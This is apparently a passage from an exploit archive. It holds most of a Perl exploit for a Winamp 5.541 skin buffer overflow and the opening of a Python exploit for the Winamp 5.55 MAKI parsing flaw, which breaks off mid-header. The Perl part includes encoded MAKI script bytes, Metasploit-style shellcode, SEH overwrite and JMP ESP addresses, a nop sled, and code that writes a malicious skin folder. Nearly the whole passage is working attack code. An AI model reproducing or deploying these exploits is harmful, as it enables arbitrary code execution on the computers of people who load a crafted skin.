"\x62\x6A\x65\x63\x74\x01\x01\x00\x00\x0D\x00\x6F\x6E\x53\x65\x74\x58\x75\x69\x50\x61\x72\x61\x6D\x01\x01\x00\x00\x08\x00\x73\x74".
"\x72\x6C\x6F\x77\x65\x72\x01\x01\x00\x00\x0F\x00\x73\x74\x72\x69\x6E\x67\x54\x6F\x49\x6E\x74\x65\x67\x65\x72\x14\x01\x00\x00\x07".
"\x00\x73\x65\x74\x54\x65\x78\x74\x16\x01\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x70\x61\x72\x61\x6D\x14\x01\x00\x00\x0D\x00\x6F".
"\x6E\x54\x65\x78\x74\x43\x68\x61\x6E\x67\x65\x64\x14\x01\x00\x00\x0C\x00\x67\x65\x74\x41\x75\x74\x6F\x57\x69\x64\x74\x68\x14\x01".
"\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x50\x61\x72\x61\x6D\x23\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x16\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x0A\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x00\x00".
"\x00\x07\x00\x00\x00\x0C\x00\x72\x75\x6E\x74\x69\x6D\x65\x63\x68\x65\x63\x6B\x0C\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63".
"\x72\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0D\x00\x00\x00\x1F\x00\x57\x69\x6E\x61\x6D\x70\x20\x35\x2E\x35\x34\x20".
"\x28\x73\x6B\x69\x6E\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x31\x2E\x33\x34\x29\x0E\x00\x00\x00\x05\x00\x45\x72\x72\x6F\x72\x0F\x00".
"\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x18\x00\x00\x00\x04\x00\x74\x65\x78\x74\x19\x00\x00\x00\x05\x00\x6C".
"\x61\x62\x65\x6C\x1A\x00\x00\x00\x04\x00\x6C\x69\x6E\x6B\x1D\x00\x00\x00\x05\x00\x73\x68\x69\x66\x74\x1E\x00\x00\x00\x07\x00\x74".
"\x6F\x6F\x6C\x74\x69\x70\x21\x00\x00\x00\x01\x00\x78\x22\x00\x00\x00\x01\x00\x77\x03\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00".
"\x5F\x01\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\xCC\x01\x00\x00\x14\x00\x00\x00\x0F\x00\x00\x00\x7B\x02\x00\x00\x1B\x03\x00\x00".
"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0C\x01\x03\x00\x00".
"\x00\x01\x05\x00\x00\x00\x0A\x51\x10\xB9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00\x30\x02\x01\x09\x00\x00\x00\x01\x00".
"\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01\x0A".
"\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0A\x00\x00\x00\x01\x09\x00\x00\x00\x41\x01\x0B\x00\x00\x00\x0C".
"\x01\x09\x00\x00\x00\x01\x0A\x00\x00\x00\x0C\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00".
"\x01\x0F\x00\x00\x00\x01\x06\x00\x00\x00\x01\x0E\x00\x00\x00\x01\x0C\x00\x00\x00\x01\x0D\x00\x00\x00\x40\x18\x05\x00\x00\x00\x02".
"\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00".
"\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00".
"\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00\x01\x12\x00\x00\x00".
"\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x08\x00\x00\x00\x30\x02\x19".
"\x9C\xFE\xFF\xFF\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x16\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x30".
"\x02\x01\x13\x00\x00\x00\x01\x16\x00\x00\x00\x01\x18\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x14\x00\x00\x00\x01\x16\x00".
"\x00\x00\x01\x19\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x15\x00\x00\x00\x01\x16\x00\x00\x00\x01\x1A\x00\x00\x00\x70\x09".
"\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x03\x1B\x00\x00\x00\x03\x1C\x00\x00\x00\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00".
"\x01\x01\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1D\x00\x00\x00\x08\x10\x17\x00\x00".
"\x00\x01\x17\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0C\x00\x00\x00\x01\x30\x02\x01\x00\x00\x00\x00\x01\x1B\x00".
"\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x19\x00\x00\x00\x08\x10\x11\x00\x00\x00\x01\x14\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0D\x00".
"\x00\x00\x01\x02\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1A\x00\x00\x00\x08\x10\x16\x00\x00\x00\x01".
"\x15\x00\x00\x00\x01\x1C\x00\x00\x00\x01\x1E\x00\x00\x00\x70\x0E\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x03\x1F\x00\x00\x00".
"\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x20\x00\x00\x00\x01\x14\x00\x00\x00\x70\x10\x00\x00\x00\x00".
"\x01\x17\x00\x00\x00\x40\x30\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x70\x06\x00\x00\x00\x01\x01\x21\x00".
"\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x4C\x70\x06\x00\x00\x00\x01\x01".
"\x22\x00\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02".
"\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
"\x70\x41";
my $overflow1 = "\x41" x 314;
my $overflow2 = "\x41" x 128;
my $overflow3 = "\x90" x 8;
my $sehjmp = "\xeb\x12\x41\x41";
my $sehret = "\x11\x10\xf0\x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "\xf8\x99\x01\x12"; #0x120199F8 JMP ESP
my $nopsled = "\x90" x 12;
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit\n";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)\n";
print "[x] Creating skin dir\n";
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml file\n";
open(my $skin_xml_file, ">SkD's Skin\\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI script\n";
open(my $maki_script_file, ">SkD's Skin\\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!\n";
# milw0rm.com [2009-03-05]

458
platforms/windows/local/8770.py
View file

@ -1,229 +1,229 @@
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0d\x51\x4a"
"\x91\xe3\xa6\xb5\x32\x35\xf3\xe7\x64\x0f\xf5\xd6\xfa\x93\xb7\x49\x93\xf1\xba\x66"
"\xef\xae\x3e\x98\x7b\xc4\x0d\xe9\x0d\x84\xe7\x4a\xb0\x2c\x04\x0b\xd2\x75\xf7\xfc"
"\xb5\x3a\x02\xb2\x4d\x43\xa1\x4b\xbe\xae\x59\x63\x75\x03\xf3\xc6\x78\x57\xc6\x87"
"\x43\xe7\xfe\x49\x85\xf9\x09\xcc\x53\x2a\xfd\x56\x65\x36\x60\x38\x1b\x46\xa7\x42"
"\xaa\x75\xd8\x3f\x66\x67\xbf\x73\xf4\x7a\x78\xf4\xbb\xb2\xf7\x4e\x9c\xfb\xe7\x4b"
"\xa9\xbe\xa8\x8d\x02\x0c\x37\x3a\xbf\x3c\x9f\x43\x84\xf1\x86\x88\x5b\xcf\x1e\x36"
"\xb6\x5b\x0c\x5d\xe1\x7d\x1f\x4b\xa7\x0f\x8d\x16\x59\x94\x19\x41\x99\xe1\xe3\x4e"
"\x36\xc6\xec\x4b\x97\xcd\x78\xbc\x9c\x86\x28\xb0\xe5\x95\xbe\x45\x72\x20\x91\x41"
"\x93\x5c\xbb\x5f\xf9\xf1\x17\xfd\x4e\x6d\x90\x60\x7e\x53\x2e\x48\xb0\x04\xcc\x94"
"\x61\x88\x56\x72\xc0\xbc\x3a\x40\x22\x6f\xd6\x4b\x8b\xa4\x10\xc8\x29\x93\x25\x47"
"\x4d\x3e\xaa\x97\xd0\xf4\xa8\x4f\x81\x7b\x0a\xf2\x2a\x45\x49\x83\xfa\xbb\xe4\x64"
"\xf4\x81\xd9\x49\xb0\xc0\xa8\x5b\x2e\xc3\xbc\xfd\x3f\x5e\xb6\x62\x5e\x37\x8d\x40"
"\x8d\xea\x76\x81\x4a\xb9\x1b\x77\xbe\x97\x4f\xce\xb0\x77\x19\x4e\x99\x56\xd4\x98"
"\x33\xc9\x6c\x27\x0d\x20\xc2\xa8\xeb\x51\x2a\x4b\xba\x7f\x5d\x4b\xc6\x5d\x4c\x71"
"\x38\xba\x1e\x8d\x9e\x48\x3e\x48\xb9\x60\x8d\x1f\x43\xc5\xc4\x05\x40\xc9\x08\x0f"
"\x39\xaf\x23\x4b\x80\xf3\xb8\xc4\x8f\x7e\xbb\x59\x72\x86\xaa\xef\x0e\x31\xfa\x41"
"\xb7\xdc\x85\xa9\x52\x5b\xcb\x4b\x44\x32\xfd\x7d\x51\x37\x7c\x4e\xbf\x40\x82\xae"
"\x5f\x3a\xdc\x33\x15\xfa\xb9\x5a\x7d\x9a\x57\x45\xab\xc8\x65\x57\xa6\xc6\x7c\xa9"
"\xcd\xdd\x8e\x69\x1e\x8f\xec\x4f\x9b\x12\xf9\x44\xf9\x09\xff\x45\x27\xcd\x64\x6b"
"\x26\x5a\x4b\x4c\x8c\x59\xe6\xa7\x0c\xf6\x49\x3a\xe4\x05\xcb\x6d\xc4\x8a\xc2\x48"
"\xb1\x93\x49\xf0\x91\x0e\xf5\x4a\xff\xcf\xdc\xb4\xfe\x81\xcc\x4b\x96\x1b\x72\x0f"
"\xd5\xbe\x0f\xff\xe1\x8c\xe2\x01\x59\xb0\xd5\x11\x97\x9f\xe4\xde\x6f\x51\x76\x0a"
"\xbd\xf8\xf0\x80\xa5\x1b\xa6\x42\xa0\x93\x32\x36\xa0\x0c\x8d\x4a\x1b\x34\x2e\x9b"
"\x98\x6c\xfa\x40\x8b\x85\x0c\x1b\x6e\xe8\x94\x05\x71\x9b\xd5\x36\xfd\x03\xf8\x4a"
"\x97\x95\x05\x02\xb7\xdb\x26\x7a\x10\xf2\xd5\x7f\xc4\xac\xdf\x48\xa6\xa0\x54\x51"
"\x57\x6c\xdc\x76\x35\xa5\xba\xb5\xb3\x05\xcb\x4d\xad\xc1\xe6\x18\xd2\x8f\x68\x96"
"\xc1\xfe\x29\x61\xb7\xda\x51\x4d\x91\x65\x01\xca\x0c\x1b\x70\xdb\xf7\x14\x95\xd5"
"\x36\xed\xe8\x45\x98\x0f\x3f\x4e\xa0\x52\x2c\xd9\x82\x4b\x3b\x9b\x7a\x66\x0e\x42"
"\x8f\xfc\x79\x41\x15\x80\x9c\x02\x99\x31\xed\xc7\x19\x53\x98\x47\x98\x63\x60\xb1"
"\x5a\x29\x8c\xaa\x4d\xc1\xbb\xe2\xf6\x84\x73\x41\xbd\xb3\xb2\xeb\x2f\x66\x55\x50"
"\x94\x05\xc0\x73\x1f\x96\x1b\x40\x9b\x1b\x67\x24\x27\xac\x41\x65\x0e\x00\x00\x00"
"\x01\x01\x00\x00\xab\xb0")
header2=(
"\x01\x01\x00\x00\x0b\x00\x67\x65\x74\x53\x6b\x69\x6e\x4e\x61\x6d\x65\x01\x01\x00"
"\x00\x0d\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00"
"\x0c\x00\x67\x65\x74\x54\x69\x6d\x65\x4f\x66\x44\x61\x79\x01\x01\x00\x00\x0d\x00"
"\x73\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00\x0a\x00\x6d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x01\x01\x00\x00\x0f\x00\x69\x6e\x74\x65\x67"
"\x65\x72\x54\x6f\x53\x74\x72\x69\x6e\x67\x01\x01\x00\x00\x0e\x00\x6f\x6e\x53\x63"
"\x72\x69\x70\x74\x4c\x6f\x61\x64\x65\x64\x01\x01\x00\x00\x0e\x00\x67\x65\x74\x53"
"\x63\x72\x69\x70\x74\x47\x72\x6f\x75\x70\x0a\x01\x00\x00\x09\x00\x67\x65\x74\x4f"
"\x62\x6a\x65\x63\x74\x17\x01\x00\x00\x0b\x00\x6f\x6e\x4c\x65\x66\x74\x43\x6c\x69"
"\x63\x6b\x01\x01\x00\x00\x12\x00\x6e\x61\x76\x69\x67\x61\x74\x65\x55\x72\x6c\x42"
"\x72\x6f\x77\x73\x65\x72\x01\x01\x00\x00\x19\x00\x67\x65\x74\x50\x6c\x61\x79\x49"
"\x74\x65\x6d\x4d\x65\x74\x61\x44\x61\x74\x61\x53\x74\x72\x69\x6e\x67\x01\x01\x00"
"\x00\x17\x00\x67\x65\x74\x50\x6c\x61\x79\x49\x74\x65\x6d\x44\x69\x73\x70\x6c\x61"
"\x79\x54\x69\x74\x6c\x65\x1f\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x00\x00\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x0e\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x72\x75\x6e\x74\x69\x6d"
"\x65\x63\x68\x65\x63\x6b\x0c\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63\x72"
"\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0d\x00\x00\x00\x1f\x00\x57"
"\x69\x6e\x61\x6d\x70\x20\x35\x2e\x35\x34\x20\x28\x73\x6b\x69\x6e\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x20\x31\x2e\x33\x34\x29\x0e\x00\x00\x00\x05\x00\x45\x72\x72\x6f"
"\x72\x0f\x00\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x14\x00"
"\x00\x00\x0a\x00\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x16\x00\x00\x00\x12\x00"
"\x77\x69\x6e\x73\x68\x61\x64\x65\x69\x63\x6f\x6e\x6d\x6f\x64\x65\x72\x6e\x18\x00"
"\x00\x00\x31\x00\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6c\x69\x65\x6e\x74\x2e\x77\x69"
"\x6e\x61\x6d\x70\x2e\x63\x6f\x6d\x2f\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x2f"
"\x61\x72\x74\x69\x73\x74\x2f\x3f\x69\x63\x69\x64\x3d\x19\x00\x00\x00\x0c\x00\x26"
"\x61\x72\x74\x69\x73\x74\x4e\x61\x6d\x65\x3d\x1a\x00\x00\x00\x06\x00\x61\x72\x74"
"\x69\x73\x74\x1c\x00\x00\x00\x0b\x00\x75\x76\x6f\x78\x2f\x61\x72\x74\x69\x73\x74"
"\x1d\x00\x00\x00\x0a\x00\x63\x62\x73\x2f\x61\x72\x74\x69\x73\x74\x1e\x00\x00\x00"
"\x0b\x00\x73\x74\x72\x65\x61\x6d\x74\x69\x74\x6c\x65\x02\x00\x00\x00\x00\x00\x00"
"\x00\x07\x00\x00\x00\x53\x01\x00\x00\x13\x00\x00\x00\x0a\x00\x00\x00\x86\x01\x00"
"\x00\xd1\x02\x00\x00\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00"
"\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0c\x01\x03\x00\x00\x00\x01\x05"
"\x00\x00\x00\x0a\x51\x10\xb9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00"
"\x30\x02\x01\x09\x00\x00\x00\x01\x00\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00"
"\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0a\x00\x00"
"\x00\x01\x09\x00\x00\x00\x41\x01\x0b\x00\x00\x00\x0c\x01\x09\x00\x00\x00\x01\x0a"
"\x00\x00\x00\x0c\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00"
"\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x06\x00\x00\x00\x01\x0e\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x0d\x00"
"\x00\x00\x40\x18\x05\x00\x00\x00\x02\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00"
"\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00"
"\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x0f\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x12\x00\x00\x00\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01"
"\x00\x00\x00\x21\x19\xa8\xfe\xff\xff\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21"
"\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x01\x14\x00\x00"
"\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x01\x02\x00\x00\x00"
"\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x15\x00\x00\x00\x19\x4d\x00\x00"
"\x00\x30\x02\x01\x15\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x06\x00\x00\x00\x01"
"\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x16\x00\x00\x00\x30\x02\x01\x00\x00"
"\x00\x00\x01\x18\x00\x00\x00\x01\x17\x00\x00\x00\x40\x01\x19\x00\x00\x00\x40\x01"
"\x15\x00\x00\x00\x40\x70\x0b\x00\x00\x00\x01\x02\x01\x01\x00\x00\x00\x21\x01\x1b"
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1a\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30"
"\x02\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00"
"\x00\x00\x01\x00\x00\x00\x00\x01\x1c\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02"
"\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00"
